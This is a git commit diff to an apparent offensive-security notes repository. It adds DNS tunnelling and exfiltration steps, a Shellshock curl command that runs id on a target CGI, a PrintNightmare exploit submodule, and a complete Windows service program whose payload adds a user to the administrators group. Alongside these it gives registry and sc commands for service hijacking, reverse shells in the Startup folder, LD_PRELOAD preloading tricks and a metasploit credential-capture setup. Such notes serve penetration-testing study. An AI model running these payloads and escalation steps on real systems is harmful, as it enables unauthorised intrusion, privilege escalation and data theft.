bump

2021-10-31 02:43:24 +02:00 · 2021-10-31 02:43:24 +02:00 · 6b8f9472c7
parent 016773b802
commit 6b8f9472c7
12 changed files with 278 additions and 1 deletions
--- a/.gitmodules
+++ b/.gitmodules
@ -49,3 +49,6 @@
 [submodule "post_exploitation/priv_esc/privesc-scripts/linuxprivchecker"]
 	path = post_exploitation/priv_esc/privesc-scripts/linuxprivchecker
 	url = https://github.com/linted/linuxprivchecker
+[submodule "exploit/windows/CVE-2021-1675"]
+	path = exploit/windows/CVE-2021-1675
+	url = https://github.com/calebstewart/CVE-2021-1675
--- a/exfiltration/dns/dns.md
+++ b/exfiltration/dns/dns.md
@ -0,0 +1,49 @@
+# DNS
+
+* [Root Servers](https://www.iana.org/domains/root/servers)
+* [Zones](https://www.cloudflare.com/learning/dns/glossary/dns-zone/)
+* [Records](https://www.cloudflare.com/learning/dns/dns-records/)
+
+## Tunneling
+* [Tunnel IPv4 Data through DNS](https://github.com/yarrick/iodine.git)
+* Start server on an outside DNS server. This may be a evs.
+```sh 
+iodined -b 47110-f 10.0.0.1 tunnel.test.com
+```
+* Use client via
+```sh
+iodine -f -r <server-IP> tunnel.test.com
+```
+* `NS` record of the owned domain should contain the subdomain, e.g. `tunnel.test.com`
+* Client gets a tunnel IP in the range of `10.0.0.0/8`
+* Check connection via 
+```sh
+ping <server-IP>
+```
+* Generate ssh-key and put in on the server
+* Dynamic port forwarding to server via
+```sh
+ssh <user>@10.0.0.1 -D 8080
+```
+* User proxy server on the client's web server like `--proxy-server` or use a SOCKS proxy like FoxyProxy
+
+## nslookup
+```sh
+nslookup type=txt <domain>
+```
+
+## Reverse lookup
+* Stored inside `PTR` record
+* Reverse IP may look like `<IP>.in-addr.arpa.`, but not via `drill` or `dig`
+```sh
+drill -x +short <IP>
+```
+
+## Exfiltration
+* Add data to UDP DNS requests
+* Capture traffic on an owned DNS server
+* `253` is the max length of a DNS name
+* Encode the payload to hide it 
+
+## Infiltration
+* Inside `TXT` or any other possible records
--- a/exploit/binaries/r2.md
+++ b/exploit/binaries/r2.md
@ -9,14 +9,47 @@ r2 -d <binary>
 ```sh
 aaa
 ```
+* Show all info
+```sh
+ia
+```
+* Search for strings
+```sh
+izz
+```
+* Main address
+```sh
+iM
+```
+* Entrypoint
+```sh
+ie
+```
+* Current memory address
+```sh
+s
+```
+* Show address of function or register, respectively
+```sh
+s <func>
+sr <reg>
+```
 * Show main
 ```sh
 pdf @main
 ```
+* Show main and follwing functions
+```sh
+pd @main
+```
 * Breakpoint
 ```sh
 db 0xdeadbeef
 ```
+* Show all breakpoints
+```sh
+dbi
+```
 * Show rbp-0x4
 ```sh
 px @rbp-0x4
@ -37,6 +70,21 @@ dr
 ```sh
 ood
 ```
+### Visual Mode
+* Enter visual mode via `VV`
+* Enter normal mode inside visual mode via `:`
+* Add comment via `;`
+
+### Write Mode
+* Enter write mode via `w`
+* Write cache list via `wc`
+* Alter/modify opcode at current seek via `wA`
+* Use as follows
+```sh
+s <memoryaddress>
+wx <newOpcode>
+dc
+```

 ## AT&T Instructions
 * leaq src, dst: this instruction sets dst to the address denoted by the expression in src
--- a/exploit/linux/ld_preload.md
+++ b/exploit/linux/ld_preload.md
@ -2,7 +2,11 @@

 * Preload libs and do interpositioning of functions.

-## Example
+*  `man ld.so`
+*  `man dlsym`, `dlsym()` calls the original function
+
+## Example 1
+* Interpositioning of `_init()`
 ```sh
 #include <stdio.h>
 #include <sys/types.h>
@ -19,3 +23,34 @@ void _init() {
 * `sudo LD_PRELOAD=lib.so apache2`
 * `$ id`

+
+## Example 2
+* Interpositioning of `write()`
+```C
+#include <stdio.h>
+#include <unistd.h>
+#include <dlfcn.h> // Contains _GNU_SOURCE from man dlsym
+#include <string.h>
+ssize_t write(int fildes, const void *buf, size_t nbytes)
+{
+    ssize_t result;
+    do the thing;
+    return result;
+}
+```
+* In case the symbol lookup returns an error libdl is linked
+```sh
+gcc -ldl interpositioning.c -fPIC -shared -D _GNU_SOURCE -o interpositioning.so -ldl` 
+```
+## Preloading
+* Dependent on the installation status of lib32 and/or lib64 and various packages the path of `LD_PRELOAD` has to be set differently. These may look as follows
+* `LD_PRELOAD=./interpositioning.so <binary>`
+or
+* `export LD_PRELOAD=$(pwd)/interpositioning.so`
+or
+* Global preload via `/etc/ld.so.preload`
+or
+* Change the preload path via `LD_PRELOAD_PATH`
+
+* Verify via `ldd <somebinary>`
+
--- a/exploit/linux/shell_shock.md
+++ b/exploit/linux/shell_shock.md
@ -0,0 +1,6 @@
+# Shell Shock
+
+* Check target via
+```sh
+curl -A "() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id" http://<target-IP>/cgi-bin/test/test.cgi
+```
--- a/exploit/windows/CVE-2021-1675
+++ b/exploit/windows/CVE-2021-1675
@ -0,0 +1 @@
+Subproject commit ed724e576adb377b9c5b91f4343012108307fff9
--- a/exploit/windows/service_escalation/service.c
+++ b/exploit/windows/service_escalation/service.c
@ -0,0 +1,76 @@
+#include <windows.h>
+#include <stdio.h>
+
+#define SLEEP_TIME 5000
+
+SERVICE_STATUS ServiceStatus;
+SERVICE_STATUS_HANDLE hStatus;
+
+void ServiceMain(int argc, char** argv);
+void ControlHandler(DWORD request);
+
+//add the payload here
+int Run()
+{
+    system("cmd.exe /k net localgroup administrators user /add");
+    return 0;
+}
+
+int main()
+{
+    SERVICE_TABLE_ENTRY ServiceTable[2];
+    ServiceTable[0].lpServiceName = "MyService";
+    ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;
+
+    ServiceTable[1].lpServiceName = NULL;
+    ServiceTable[1].lpServiceProc = NULL;
+
+    StartServiceCtrlDispatcher(ServiceTable);
+    return 0;
+}
+
+void ServiceMain(int argc, char** argv)
+{
+    ServiceStatus.dwServiceType        = SERVICE_WIN32;
+    ServiceStatus.dwCurrentState       = SERVICE_START_PENDING;
+    ServiceStatus.dwControlsAccepted   = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
+    ServiceStatus.dwWin32ExitCode      = 0;
+    ServiceStatus.dwServiceSpecificExitCode = 0;
+    ServiceStatus.dwCheckPoint         = 0;
+    ServiceStatus.dwWaitHint           = 0;
+
+    hStatus = RegisterServiceCtrlHandler("MyService", (LPHANDLER_FUNCTION)ControlHandler);
+    Run();
+
+    ServiceStatus.dwCurrentState = SERVICE_RUNNING;
+    SetServiceStatus (hStatus, &ServiceStatus);
+
+    while (ServiceStatus.dwCurrentState == SERVICE_RUNNING)
+    {
+                Sleep(SLEEP_TIME);
+    }
+    return;
+}
+
+void ControlHandler(DWORD request)
+{
+    switch(request)
+    {
+        case SERVICE_CONTROL_STOP:
+                        ServiceStatus.dwWin32ExitCode = 0;
+            ServiceStatus.dwCurrentState  = SERVICE_STOPPED;
+            SetServiceStatus (hStatus, &ServiceStatus);
+            return;
+
+        case SERVICE_CONTROL_SHUTDOWN:
+            ServiceStatus.dwWin32ExitCode = 0;
+            ServiceStatus.dwCurrentState  = SERVICE_STOPPED;
+            SetServiceStatus (hStatus, &ServiceStatus);
+            return;
+
+        default:
+            break;
+    }
+    SetServiceStatus (hStatus,  &ServiceStatus);
+    return;
+}
--- a/exploit/windows/service_escalation/service_escalation.md
+++ b/exploit/windows/service_escalation/service_escalation.md
@ -0,0 +1,19 @@
+# Service Escalation
+
+* Check service control permission 
+```sh
+Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
+```
+* Add command to system() function inside `service.c`, e.g. add user to administrators group
+```sh
+cmd.exe /k net localgroup administrators user /add
+```
+* Compile via  
+```sh
+x86_64-w64-mingw32-gcc service.c service.exe
+```
+* Upload to target and
+```sh
+reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\Temp\service.exe /f
+sc start regsvc
+```
--- a/misc/hashcat_utils.md
+++ b/misc/hashcat_utils.md
@ -0,0 +1,6 @@
+# Hashcat Utilities
+
+* Combine wordlists
+```sh
+combinator wordlist.txt otherwordlist.txt > newwordlist.txt
+```
--- a/osint/spiderfoot.md
+++ b/osint/spiderfoot.md
@ -0,0 +1,8 @@
+# Spiderfoot
+
+* OSINT online spider
+* [Repo & releases](https://github.com/smicallef/spiderfoot.git)
+* Start server locally via 
+```sh
+python sf.py -l 127.0.0.1:5000
+```
--- a/post_exploitation/priv_esc/docs/windows/windows_priv_esc.md
+++ b/post_exploitation/priv_esc/docs/windows/windows_priv_esc.md
@ -75,3 +75,27 @@ runas /savecred /user:<user> reverse_shell.exe
 reg query HKLM /f password /t REG_SZ /s
 reg query HKCU /f password /t REG_SZ /s
 ```
+
+### accesschk64 Permissions
+* Check access to files and folders
+```sh
+accesschk64 -wvu "file.exe"
+```
+* If permission `SERVICE_CHANGE_CONFIG` is set
+```sh
+ sc config <service> binpath="net localgroup administrators user /add"
+```
+* [Service escalation](../../../../exploit/windows/service_escalation/service_escalation.md)
+* Any other binary works as well. Copy the compiled portable executable from the `service_escalation` onto the binary path.Restart the service afterwards.
+
+### Startup Application
+* Put reverse shell instead of an executable inside `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup`  
+
+### Password Mining
+* Set up metasploit
+```sh
+use auxiliary/server/capture/http_basic
+set srvport 7777
+set uripath pass
+```
+* Visit site on target
--- a/stego/docs/outguess.md
+++ b/stego/docs/outguess.md
@ -0,0 +1,2 @@
+# Outguess
+`man outguess`
				`@ -0,0 +1 @@`
				`Subproject commit ed724e576adb377b9c5b91f4343012108307fff9`